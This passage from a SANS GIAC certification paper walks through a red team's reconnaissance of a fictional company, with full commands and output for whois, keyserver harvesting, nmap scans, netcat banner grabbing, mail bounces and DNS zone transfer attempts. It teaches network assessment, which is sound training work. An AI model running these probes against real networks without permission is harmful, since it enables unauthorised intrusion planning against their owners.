Updated Date: 12-aug-2001>>> Last update of whois database: Sun, 9 Sep 2001 02:23:08 EDT <<<The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains andRegistrars.[whois.networksolutions.com]The Data in Network Solutions' WHOIS database is provided by NetworkSolutions for information purposes, and to assist persons in obtaining
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 7 of 49information about or related to a domain name registration record.Network Solutions does not guarantee its accuracy.  By submitting aWHOIS query, you agree that you will use this Data only for lawfulpurposes and that, under no circumstances will you use this Data to:(1) allow, enable, or otherwise support the transmission of massunsolicited, commercial advertising or solicitations via email(spam); or  (2) enable high volume, automated, electronic processesthat apply to Network Solutions (or its systems).  Network Solutionsreserves the right to modify these terms at any time.  By submittingthis query, you agree to abide by this policy.Registrant:GIAC Enterprises (GIAC-DOM)   123 Really Busy Place   Kilimanjaro, WA 90210   US   Domain Name: GIACE.COM   Administrative Contact, Billing Contact:      Mingo, Marti (MM0002) mmingo@giace.com      GIAC Enterprises      123 Really Busy Place      Kilimanjaro, WA 90210      (800) 555-1212 (FAX) (800) 555-1211   Technical Contact:      Donovan, James (JD0001) jdonovan@giace.com      GIAC Enterprises      123 Really Busy Place      Kilimanjaro, WA 90210      (800) 555-1211 (FAX) (800) 555-1211   Record last updated on 01-Nov-2000.   Record created on 11-Aug-1993.   Database last updated on 8-Sep-2001 23:56:00 EDT.   Domain servers in listed order:   DNS.GIACE.COM3.3.3.7   DNSAUTH1.ISP.NET102.11.85.129   DNSAUTH2.ISP.NET102.11.145.5linux $The output from the “whois” command gives us several important pieces of information to beginour reconnaissance with.   From this output, we learn about the existence of three DNS servers,more email addresses, and additional contact information.  Two of the DNS servers look likethey are managed outside of GIAC Enterprises Headquarters by their ISP, ISP.net.  The otherDNS server may be managed internally by GIAC Enterprises technical staff.While further analysis of the GIAC Enterprises ISP network may be valuable to the red team,there is insufficient information provided in Stuckless’ paper to evaluate those risks.Vulnerabilities that may exist in the ISP network will not be used for the purposes of thisdocument.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 8 of 49A2. Search ARIN registered address space used by the company.  This will be criticalinformation for use when actively probing the company network, and may reveal additional ISPinformation.Tool Used: ARIN Search interface at http://www.arin.net/Commands Typed: Searches for multiple criteria including company name and IP addresses ofDNS servers revealed in A1.Output Received: BelowThe output from ARIN searches will indicate what netblocks are in use by the organization.  Wecan use several search criteria including a single IP address, organization name, or contact name.Often, netblocks will be listed as sub-blocks of larger networks, revealing the entity managingthose networks; this is usually a good indicator of the ISP that provides service to the company.Output from ARIN WHOIShttp://www.arin.net/whois                               Search for : giace.com     GIAC ENTERPSIES  (NETBLK-GIE-3-3-3) NETBLK-GIE-3-3-3                                                      3.3.3.0 - 3.3.3.255     GIAC ENTERPRISES (NETBLK-GIE-2-2-2) NETBLK-GIE-2-2-2                                                      2.2.2.0 - 2.2.2.255     GIAC ENTERPRISES (NETBLK-GIE-1-1-1) NETBLK-GIE-1-1-1                                                      1.1.1.0 - 1.1.1.255For the purposes of this red team assessment, we will learn that the public netblocks for GIACEnterprises are 3.3.3.0/24, 2.2.2.0/24 and 1.1.1.0/24.A3. Query public search engines to discover additional information about the company.  Thismay be in the form of links to the organization’s web site, references to the products and servicesoffered at the company, and potentially exploitable references to business-to-business (B2B)partnerships.Tool Used: Your favorite search engine.  I will include examples that work with the Googlesearch engine (http://www.google.com).Commands Typed: Searches for multiple critera, including the following.• “+link:www.giace.com”o Sites that link to the giace.com web site.  This may include business partners,customers, resellers.• “+giace.com –site:giace.com”o Display sites that reference giace.com, but do not show hits from theirwebserver.Output Received: Varies.A common scenario for red team penetrations is to discover what companies are partnered withan organization and to penetrate their networks, looking for a less secure backdoor into the target
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 9 of 49organization’s network.  The public web site search is often used as a way to discover thesebusiness partnerships.  We will not pursue this option for the purposes of this paper.A4. Search public newsgroups to discover additional information about the company.  Usenetnewsgroups have largely become a “free helpdesk”, so it is common to discover a tremendousamount of information about the configuration and types of equipment used in a company.  Ihave seen complete firewall rule configurations posted to newsgroups when a weary systemsadministrator was attempting to troubleshoot a problem, and many instances of “We are using Xrouter and Y switch and Z firewall, how can I get A to work on all three?  X is version 1.2.3, Y isrevision 2 ...”Tool Used: Any Usenet news search engine.  I will include examples that work with the Googlesearch engine (http://www.dejanews.com).Commands Typed: Searches for multiple critera, including the following.• +giace.com• +”John Doe”• +”James Donovan”• +giace.com +NTo When attempting to reduce hits by targeting a specificplatform.Output Received: Varies.This illustrates an all-too common example of information leakage within an organization.  Theresults of this type of search varies tremendously depending on the security policy of thecompany and how well it is enforced.  For the purposes of this paper, we will assume that we areable to determine that the organization utilizes a Windows NT 4.0 domain from a post on thenews://microsoft.public.windowsnt.domain newsgroup by a system administrator at GIACEnterprises.A5. Venture capital companies often list a wealth of information about a company includingbusiness plans, major capital acquisitions (servers, networking equipment), and key staff.  Thered team can use this information to build on what is known about an organization.Tool Used: A web browser to visit and search venture capital company web sites.  A list of VC’sthat are affiliated with an organization may be discerned in A3.Commands Typed: Varies.Output Received: Varies.The output of information received from searching VC web sites will not be used for thepurposes of this document.A6.  Public key server databases provide universally accessible storage of public keys for variousencryption applications.  By searching these databases, it is possible to discover whether public
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 10 of 49key encryption technology is used at an organization, and the level of encryption used/supportedby clients.Tool Used:  A web browser to search the public key servers athttp://www.cam.ac.uk.pgp.net/pgpnet/wwwkeys.html.Commands Typed: “giace.com” in the search fieldOutput Received:Public Key Server -- Index ``giace.com ''Type bits/keyID    Date       User IDpub  1024/3460A18A 2001/06/25 John Doe <jdoe@giace.com>pub  1024/3E3AF3AB 2001/06/20 James Donovan <jdonovan@giace.com>pub  1024/CF450B1C 2001/06/18 William Dolterhund <wdolterhund@giac.com>pub  1024/9ACD6BEF 2001/06/11 Marti Mingo <mmingo@giace.com>pub  1024/B7F0509B 2001/06/05 Kevin E. Cribbs <kcribbs@giace.com>pub  1024/511712CE 2001/05/24 Connie Etherton <cetherton@giace.com>pub  1024/927322FF 2001/05/23 Dana Keith <dkeith@giace.com>pub  1024/82991D9A 2001/05/23 Connie Morgan <cmorgan@giace.com>pub  1024/AEA694AB 2001/05/23 Dana Keith <dkeith@giace.com>pub  1024/1D2BD6BC 2001/05/10 Dennis Beem <dbeem@giace.com>pub  1024/135ACEDD 2001/05/10 Teresa Ramirez <tramirez@giace.com>pub  1024/2BAE439E 2001/05/09 Terry Lofgren <tlofgren@giace.com>pub  1024/07404BFF 2001/05/09 Sid Lantz <slantz@giace.com>pub  1024/CEB9762A 2001/05/08 Joanne Vien <jvien@giace.com>pub  1024/FF7C083B 2001/05/08 Dana Keith <dkeith@giace.com>pub  1024/E7E8C3BC 2001/05/08 Sean Farren <sfarren@giace.com>pub  1024/2615532D 2001/05/07 Arvind Patel <apatel@giace.com>pub  1024/8CDCBC9E 2001/05/07 Jerry A. Ruth <jruth@giace.com>pub  1024/010902FA 2001/05/04 Fritz Fisher <ffisher@giace.com>pub  1024/1C3018CB 2001/05/03 Bill McKelvey <bmckelvey@giace.com><snip>Since we discovered several users that utilize public key severs for the storage of their publickeys, we can theorize that GIAC Enterprises does utilize encryption for data.  We have alsodiscovered they are using the free GnuPG tool through the “Comment” section of their keys.A7.  Many other public sources are available that reveal more information about a company.The primary limiting factor in discovering what information is available and where it is stored isthe amount of time spent in the reconnaissance phase: a dedicated group of individuals will oftenhave a nearly unlimited amount of time to page through thousands of references to theorganization.  Some additional sources for searching include the following:• Press Releases from other companies referencing GIAC Enterprises.  This may be inthe form of an announcement that a company has been the first to adopt a giventechnology in certain locations throughout their organization.  This is common withtechnology-related organizations.• EDGAR archives maintained by the Securities Exchange Commission provide awealth of financial and business information about medium to large publicly tradedcompanies.  The banking relationships and B2B partnerships discovered in these
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 11 of 49filings can be used to exploit “weakest link” network accessibility, by attacking thebusiness peer with the weakest perimeter defense.• Reference lists from other organizations.  These lists of references may be given topotential customers to verify the grandiose claims a manufacturer presents in a salespitch.• Network diagrams, implementation details and other technical information can begathered about companies that have been spotlighted in technical journals such asNetwork World or Information Week.  For example, Network Magazine boasts a bi-weekly network diagram of a company calling out the types and quantities of servers,routers, switches and firewalls; available athttp://www.networkcomputing.com/docs/ctr.html.Network ProbingAfter completing the Reconnaissance stage, we have collected several pieces of informationabout a company including technical and administrative contacts, addressing information and alist of public servers (web site, SMTP server, possibly other servers).  With this information, wecan start actively probing the network(s) in use to gather additional information.B1.  Determine the hop path and hop count to the company webserver.Tool Used: Unix supplied “traceroute” tool, or the Windows-supplied “tracert” tool.  It ispossible to also use anonymous looking-glass tools through a web front end such as thoseavailable at http://nitrous.digex.net.Command Typed: “traceroute www.giace.com”Output Received:Translating "www.giace.com"...domain server (5.5.5.5) [OK]Type escape sequence to abort.Tracing the route to www.giace.com  1 sjc3-core4-pos6-0.atlas.icix.net (165.117.67.242) 0 msec 0 msec 0 msec  2 sjc2-core2-pos5-2.atlas.icix.net (165.117.67.137) 0 msec 0 msec 0 msec  3 sjc2-core1-pos5-0.atlas.icix.net (165.117.60.121) 4 msec 4 msec 0 msec  4 intermedia.exodus.net (169.117.64.6) 0 msec 0 msec 0 msec  5 sjo-core-02.inet.exodus.net (205.179.22.65) [AS 2542] 0 msec 4 msec 0 msec  6 dca-core-02.inet.exodus.net (205.179.5.137) [AS 2542] 80 msec 76 msec 80 msec  7 wdc-core-01.inet.exodus.net (205.179.8.210) [AS 2542] 76 msec 80 msec 76 msec  8 wdc-core-02.inet.exodus.net (205.179.24.2) [AS 2542] 76 msec 76 msec 76 msec  9 jfk-core-01.inet.exodus.net (205.179.5.233) [AS 2542] 84 msec 84 msec 84 msec 10 jfk-core-03.inet.exodus.net (205.179.230.6) [AS 2542] 80 msec 84 msec 84 msec 11 jfk-edge-04.inet.exodus.net (205.179.30.114) [AS 2542] 80 msec 80 msec 84 msec 12 1.1.1.2 (1.1.1.2) 80 msec 80 msec 90 msec 13  *  *  * 14  *  *  * 15  *  *  * 16  *  *  * 17  *  *  * 18  *  *  * 19  *  *  *
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 12 of 49 20  *  *  * 21  *  *  * 22  *  *  * 23  *  *  * 24  *  *  * 25  *  *  * 26  *  *  * 27  *  *  * 28  *  *  * 29  *  *  * 30  *  *  *With this output, we can determine several pieces of information about the target network.  Thelast hop before the destination is usually a border router, either managed by the ISP or the targetcompany.  Resolving DNS names with the “traceroute” command or later lookups with the“host” command may indicate the ISP in use through domain names, typically with somegeographic information (state, city, country code).  Output of all asterisks usually indicates a hopthat is dropping packets, a good indicator of a firewall in use.The output presented here indicates that the www.giace.com site is inaccessible after hop 1.1.1.2.We will later probe the device at 1.1.1.2 and attempt to determine OS and hardware type.B2.  Attempt to ping several sites to elicit responses and determine if ICMP echo request trafficis permitted to reach various destinations, and if ICMP echo reply traffic is permitted to return tothe source.Tool Used: Unix or Windows NT supplied “ping” tool.  It is possible to also use anonymouslooking glass tools through a web front end such as those available at http://nitrous.digex.net.Commands Typed: “ping -s www.giace.com 64 4”, “ping -s dns.giace.com 64 4”,“ping -s 1.1.1.2 64 4”.Output:linux $ ping -s www.giace.com 64 4PING www.giace.com: 64 data bytes----3.3.3.5 PING Statistics----4 packets transmitted, 0 packets received, 100% packet losslinux $linux $ ping -s dns.giace.com 64 4PING dns.giace.com: 64 data bytes----3.3.3.7 PING Statistics----4 packets transmitted, 0 packets received, 100% packet losslinux $linux $ ping -s 1.1.1.2 64 4PING 1.1.1.2: 64 data bytes72 bytes from 1.1.1.2: icmp_seq=0. time=80. ms72 bytes from 1.1.1.2: icmp_seq=1. time=80. ms72 bytes from 1.1.1.2: icmp_seq=2. time=120. ms72 bytes from 1.1.1.2: icmp_seq=3. time=88. ms----localhost PING Statistics----4 packets transmitted, 4 packets received, 0% packet loss
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 13 of 49round-trip (ms)  min/avg/max = 80/92/120linux $As we can see, we are unable to elicit ICMP echo replies from any of the hosts listed above, withthe exception of the router discovered with the “traceroute” command.  An early assumptionwould be that the servers (dns, www) are protected by some sort of filtering device from eitherreceiving or sending ICMP echo style traffic, but the router is not.B3.  Attempt to contact known sites with ICMP timestamp and address mask requests.Tool Used: singCommands Typed: “sing -mask 1.1.1.2 -c 1”, “sing -tstamp 1.1.1.2 -c 1”, “sing -mask www.giace.com -c 1”, “sing -tstamp www.giace.com -c 1”, “sing -maskdns.giace.com -c 1”, “sing -tstamp dns.giace.com -c 1”.Output:# sing -mask 1.1.1.2 -c 1SINGing to 1.1.1.2 (1.1.1.2): 12 data bytes--- 1.1.1.2 sing statistics ---1 packets transmitted, 0 packets received, 100% packet loss## sing -tstamp 1.1.1.2 -c 1SINGing to 1.1.1.2 (1.1.1.2): 20 data bytes20 bytes from 1.1.1.2: seq=0 ttl=245 TOS=0 diff=-53989204--- 1.1.1.2 sing statistics ---1 packets transmitted, 1 packets received, 0% packet loss## sing -mask www.giace.com -c 1SINGing to www.giace.com (3.3.3.5): 12 data bytes--- www.giace.com sing statistics ---1 packets transmitted, 0 packets received, 100% packet loss## sing -tstamp www.giace.com -c 1SINGing to www.giace.com (3.3.3.5): 20 data bytes--- www.giace.com sing statistics ---1 packets transmitted, 0 packets received, 100% packet loss## sing -mask dns.giace.com -c 1SINGing to dns.giace.com (3.3.3.5): 12 data bytes--- dns.giace.com sing statistics ---1 packets transmitted, 0 packets received, 100% packet loss## sing -tstamp dns.giace.com -c 1SINGing to dns.giace.com (3.3.3.5): 20 data bytes--- dns.giace.com sing statistics ---1 packets transmitted, 0 packets received, 100% packet loss#
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 14 of 49We are unable to discover information about the www.giace.com and dns.giace.com hosts fromthe commands entered above.  Since the requests for time stamp and address mask are notreturned by all operating systems, we are unable to determine if the lack of a response is due tounsupported functionality on the host or a packet filtering device.  The device at 1.1.1.2 doesrespond to our time stamp request, but does not respond to the address mask request.  Thisreinforces the earlier assumption that a filtering device does not protect the edge router.Since we have been mostly unsuccessful with ICMP style probes in the last three steps, weassume ICMP in not permitted to pass the firewall.  To continue our analysis, we continue intothe scanning and probing phase.Scanning and ProbingWe are now ready to begin probing the servers and other resources at the site directly.C1. Using any web browser, browse the company’s web site.  Often, the web site will discloseinformation that is valuable to the red team.Tool Used: Internet Explorer, Netscape NavigatorCommand Typed: “netscape http://www.giace.com”Output Received: VariesCommonly, more email address and contact information can be gathered from the public website of an organization.  Often, companies will go as far to include the types of servers in use(messages like “Powered by Compaq/Sun/HP”) and may even tout “cutting edge” technologythey have recently deployed.  If a company also offers an e-commerce component, we cantheorize that at least some of the Visa “Ten Commandments” have been fulfilled for thecompany to get permission to accept credit card numbers on-line.Browsing the company web site may be considered more of a reconnaissance scan, but I felt thatsince the company would retain records of the red team IP addresses used when browsing theweb site, we should consider this part of the scanning and probing section.  It is trivial however,to masquerade one’s IP address by utilizing an anonymous proxy server from any one of severallists maintained by public web sites, keeping the identity of the red team out of the HTTP serverlogs.For the purposes of this paper red team assessment, we will assume the red team is able todiscover the name and email address of the Sales Director for GIAC Enterprises.C2. Using any mail client, attempt to obtain an undeliverable report from the company mailsystem.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 15 of 49Tool Used: Unix supplied “mail” command, or any other SMTP client/web mail tool that willreveal message header information.Command Typed: “echo “Pay No Attention”|mail asdfsdf@giace.com”Output Received:From MAILER-DAEMON@mail.giace.com Thu Sep  6 13:43:43 2001Received: from mail.giace.com (mail.GIACE.com [3.3.3.8])by sun.redteam.com (8.9.3+Sun/8.9.3) with ESMTP id NAA18599for <jwright@sun.redteam.com>; Thu, 6 Sep 2001 13:43:43 -0400 (EDT)From: MAILER-DAEMON@mail.giace.comReceived: (from daemon@localhost)by mail.giace.com (8.9.3/8.9.3) id NAA26932;Thu, 6 Sep 2001 13:44:40 -0400 (EDT)Date: Thu, 6 Sep 2001 13:44:40 -0400 (EDT)Message-Id: <200109061744.NAA26932@mail.giace.com>To: jwright@sun.redteam.comSubject: Returned mail - nameserver error reportContent-Length: 1235Status: R --------Message not delivered to the following:         asdfsdf    No matches to nameserver query --------Error Detail (phquery V4.2): This mail couldn't be delivered, because the Electronic Address Book failed to locate anyone at GIACE with that name. The most common cause of this problem is a typographical error or the use of a nickname in the address. Try using the EAB (or ph) program to determine the correct NetID (aka alias) for the individual you are trying to reach.  If ph or EAB is not available, try sending to the most explicit form of the name (e.g., if Joe_Carberry fails, try Josiah_Carberry). --------Unsent Message below:Received: from sun.redteam.com (sun.redteam.com [138.91.123.101])by mail.giace.com (8.9.3/8.9.3) with ESMTP id NAA26898for <asdfsdf@GIACE.com>; Thu, 6 Sep 2001 13:44:39 -0400 (EDT)From: jwright@sun.redteam.comReceived: (from jwright@localhost)by sun.redteam.com (8.9.3+Sun/8.9.3) id NAA18595for asdfsdf@GIACE.com; Thu, 6 Sep 2001 13:43:41 -0400 (EDT)Date: Thu, 6 Sep 2001 13:43:41 -0400 (EDT)Message-Id: <200109061743.NAA18595@sun.redteam.com>Content-Type: textPay No Attention --------End of Unsent MessageReceiving an undeliverable report will allow the red team to learn more about the type of mailservers in use; commonly these also reveal IP addresses and SMTP banner information.  Fromthis output, we learn that GIAC Enterprises is offering a public mail server at 3.3.3.8(mail.giace.com).
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 16 of 49C3.  Perform port scanning on known hosts to discover the services that are offered.Tool Used: Everyone’s favorite port scanner, nmap.Commands Typed: “nmap –sS –F –P0 www.giace.com”, “nmap –sS –F –P0mail.giace.com”, “nmap –sS –F –P0 1.1.1.2”Output:linux $ nmap -sS -F -P0 www.giace.comStarting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )Interesting ports on www.giace.com (3.3.3.5):(The 1061 ports scanned but not shown below are in state: filtered)Port       State       Service80/tcp     open        httpNmap run completed -- 1 IP address (1 host up) scanned in 192 secondslinux $ nmap -sS -F -P0 mail.giace.comStarting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )Interesting ports on mail.giace.com (3.3.3.8):(The 1059 ports scanned but not shown below are in state: filtered)Port       State       Service25/tcp     open        smtpNmap run completed -- 1 IP address (1 host up) scanned in 216 secondslinux $ nmap -sS -F -P0 1.1.1.2Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )Interesting ports on  (1.1.1.2):(The 1073 ports scanned but not shown below are in state: closed)Port       State       Service23/tcp     open        telnet79/tcp     open        finger80/tcp     open        httpNmap run completed -- 1 IP address (1 host up) scanned in 38 secondslinux $Nmap is a powerful, multi-purpose tool that is often used by white-hats and black-hats whenscanning and probing networks and hosts.  We can determine several factors from the precedingoutput.• The host www.giace.com is only offering HTTP service on port 80.  The “state:filtered” message also reinforces that this server is behind some kind of packetfiltering device. The “State open” message represents ports that have responded to theTCP SYN request.• The host mail.giace.com is only offering SMTP service on port 25.  The “state:filtered” message also reinforces that this server is behind some kind of packetfiltering device.  The “State open” message represents ports that have responded tothe TCP SYN request.• The host 1.1.1.2 is offering telnet, http and finger services.  The “state: closed”message indicates that nmap received a RST/ACK message to all attempts to access
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 17 of 49closed ports, typically indicating the lack of a firewall protecting this host.  The “Stateopen” message represents ports that have responded to the TCP SYN request.C4.  Perform port scanning to discover hosts that have not yet been found.Tool Used: nmapCommands Typed: “nmap –sS –F –P0 3.3.3.1-254”, “nmap –sS –F –P0 1.1.1.2-254”Output: Belowlinux $ nmap -sS -F -P0 3.3.3.1-254Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )All 1075 scanned ports on  (3.3.3.1) are: filteredAll 1075 scanned ports on  (3.3.3.2) are: filteredAll 1075 scanned ports on  (3.3.3.3) are: filteredInteresting ports on  (3.3.3.4):(The 1074 ports scanned but not shown below are in state: filtered)Port       State       Service21/tcp     open        ftpInteresting ports on  (3.3.3.5):(The 1074 ports scanned but not shown below are in state: filtered)Port       State       Service80/tcp     open        httpInteresting ports on  (3.3.3.6):(The 1074 ports scanned but not shown below are in state: filtered)Port       State       Service21/tcp     open        httpsInteresting ports on  (3.3.3.7):(The 1074 ports scanned but not shown below are in state: filtered)Port       State       Service53/tcp     open        domainInteresting ports on  (3.3.3.8):(The 1074 ports scanned but not shown below are in state: filtered)Port       State       Service25/tcp     open        smtpAll 1075 scanned ports on  (3.3.3.9) are: filteredAll 1075 scanned ports on  (3.3.3.10) are: filteredAll 1075 scanned ports on  (3.3.3.11) are: filtered<snip>All 1075 scanned ports on  (3.3.3.254) are: filteredNmap run completed -- 1 IP address (5 hosts up) scanned in “a long time” secondslinux $ nmap -sS -F -P0 1.1.1.1-254Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )All 1075 scanned ports on  (1.1.1.1) are: filteredInteresting ports on  (1.1.1.2):(The 1072 ports scanned but not shown below are in state: closed)Port       State       Service23/tcp     open        telnet79/tcp     open        finger80/tcp     open        httpAll 1075 scanned ports on  (1.1.1.3) are: filtered<snip>All 1075 scanned ports on  (1.1.1.254) are: filteredNmap run completed -- 1 IP address (1 host up) scanned in “a long time” seconds
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 18 of 49linux $Utilizing the output received form the ARIN search in A2, we use the “common ports” scanningfeature of nmap to scan all addresses registered to the target.  This will be a long-running scan,but should discover any other servers offering resources to the public.From the preceding output, we have learned about the existence of several other serversincluding an HTTPS server, an FTP server and a DNS server.  We also note that HTTPS, FTPand DNS servers, like the HTTP and SMTP servers discovered earlier, are behind a packet-filtering device.  There appear to be no other devices on the 1.1.1.0/24 netblock other than theedge router discovered earlier.C5.  Perform “banner grabbing” on hosts to identify server type and version information.Tools Used: netcat, perl, ftpCommands Typed:• FTP server: “nc ftp.giace.com 21”• HTTP server: “nc www.giace.com 80”• SMTP server: “nc mail.giace.com 25”• HTTPS server: “perl sslcat.pl https.giace.com 443”• Gateway: “nc 1.1.1.2 23”Output Received:linux $ nc ftp.giace.com 21220 ftp Microsoft FTP Service (Version 5.0).^C punt!linux $linux $ nc www.giace.com 80GET HTTP/1.1HTTP/1.1 400 Bad RequestServer: Microsoft-IIS/5.0Date: Thu, 06 Sep 2001 18:39:05 GMTContent-Type: text/htmlContent-Length: 87<html><head><title>Error</title></head><body>The parameter is incorrect. </body></html>linux $linux $ nc mail.giace.com 25220 mail.giace.com ESMTP Sendmail 8.9.3+Sun/8.9.3; Thu, 6 Sep 2001 14:38:44 -0400(EDT)^C punt!linux $linux $ perl sslcat.pl https.giace.com 443HTTP/1.1 400 Bad RequestServer: Microsoft-IIS/5.0Date: Mon, 10 Sep 2001 12:49:44 GMTConnection: closeContent-Length: 3221Content-Type: text/html<snip>linux $linux $ nc 1.1.1.2 23
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 19 of 49 •• •• 2 2•User Access VerificationUsername: ^C punt!linux $It is often possible to determine the OS version and sometimes the patch level by grabbing thebanners provided by services.  I put together a quick perl script to utilize the sslcat functionprovided in the Net::SSLeay perl module for use in connecting to SSL services; it is included inAppendix A.From this output, we can determine several pieces of information.  It appears that the hostsproviding HTTP, HTTPS and FTP services run Windows NT, and the SMTP server is a SunSolaris server running sendmail 8.9.3.  This is very valuable to the red team when searchingthrough public vulnerability databases for exploits.  The gateway we discovered earlier at 1.1.1.2reports with a “User Access Verification” message, which indicates a Cisco device – most likelyan edge router.C6.  Use DNS interrogation tools to discover information about known and unknown hosts.Tools Used: digCommands Typed:  “dig @dns.giace.com giace.com MX”, “dig @dns.giace.comgiace.com axfr”, “dig @dnsauth1.isp.net giace.com axfr”, “dig @dnsauth2.isp.netgiace.com axfr”, “dig @dnsauth3.isp.net giace.com axfr”, “dig @dnsauth4.isp.netgiace.com axfr”Output Received: BelowThe red team will interrogate all DNS servers known to service giace.com, including those listedin step A1, perhaps provided by an ISP and managed by an external entity with a differentsecurity policy.linux $ dig @dns.giace.com giace.com MX; <<>> DiG 9.1.0 <<>> @dns.giace.com giace.com MX;; global options:  printcmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 11574;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 5, ADDITIONAL: 5;; QUESTION SECTION:;giace.com.INMX;; ANSWER SECTION:giace.com.3600INMX10 mail.giace.com.;; AUTHORITY SECTION:giace.com.3600INNSdns.giace.com.giace.com.3600INNSdnsauth1.isp.net.giace.com.3600INNSdnsauth2.isp.net.giace.com.3600INNSdnsauth3.isp.net.giace.com.3600INNSdnsauth4.isp.net.
© SANS Institute 2000 - 2002, Author retains full rights.            Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46                              Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46  © SANS Institute 2000 - 2002As part of GIAC practical repository.Author retains full rights.Page 20 of 49;; ADDITIONAL SECTION:dns.giace.com.86400INA3.3.3.7dnsauth1.isp.net.86400INA102.11.85.129dnsauth2.isp.net.86400INA102.11.145.5dnsauth3.isp.net.86400INA102.11.145.6dnsauth4.isp.net.86400INA102.11.85.21;; Query time: 30 msec;; SERVER: 3.3.3.7#53(dns.giace.com);; WHEN: Sun Sep  9 13:08:59 2001;; MSG SIZE  rcvd: 280linux $A little poking around has uncovered that the primary nameserver for giace.com at 3.3.3.7 isconfigured with 5 NS records, two more than we discovered with the “whois” output in step A1.Next, the red team will try to perform a zone transfer on each of these servers, including the ISPmanaged servers.  This is in an effort to learn more information about the GIAC Enterprisesnaming convention and servers/address space.linux $ dig @dns.giace.com giace.com axfr; <<>> DiG 9.1.0 <<>> @dns.giace.com giace.com axfr;; global options:  printcmd; Transfer failed.linux $ dig @dnsauth1.isp.net giace.com axfr; <<>> DiG 9.1.0 <<>> @dnsauth1.isp.net giace.com axfr;; global options:  printcmd; Transfer failed.linux $ dig @dnsauth2.isp.net giace.com axfr; <<>> DiG 9.1.0 <<>> @dnsauth2.isp.net giace.com axfr;; global options:  printcmd; Transfer failed.linux $ dig @dnsauth3.isp.net giace.com axfr; <<>> DiG 9.1.0 <<>> @dnsauth3.isp.net giace.com axfr;; global options:  printcmd; Transfer failed.linux $ dig @dnsauth4.isp.net giace.com axfr; <<>> DiG 9.1.0 <<>> @dnsauth4.isp.net giace.com axfr;; global options:  printcmd; Transfer failed.linux $The DNS servers maintained by GIAC Enterprises and ISP.net are all configured to disallowzone 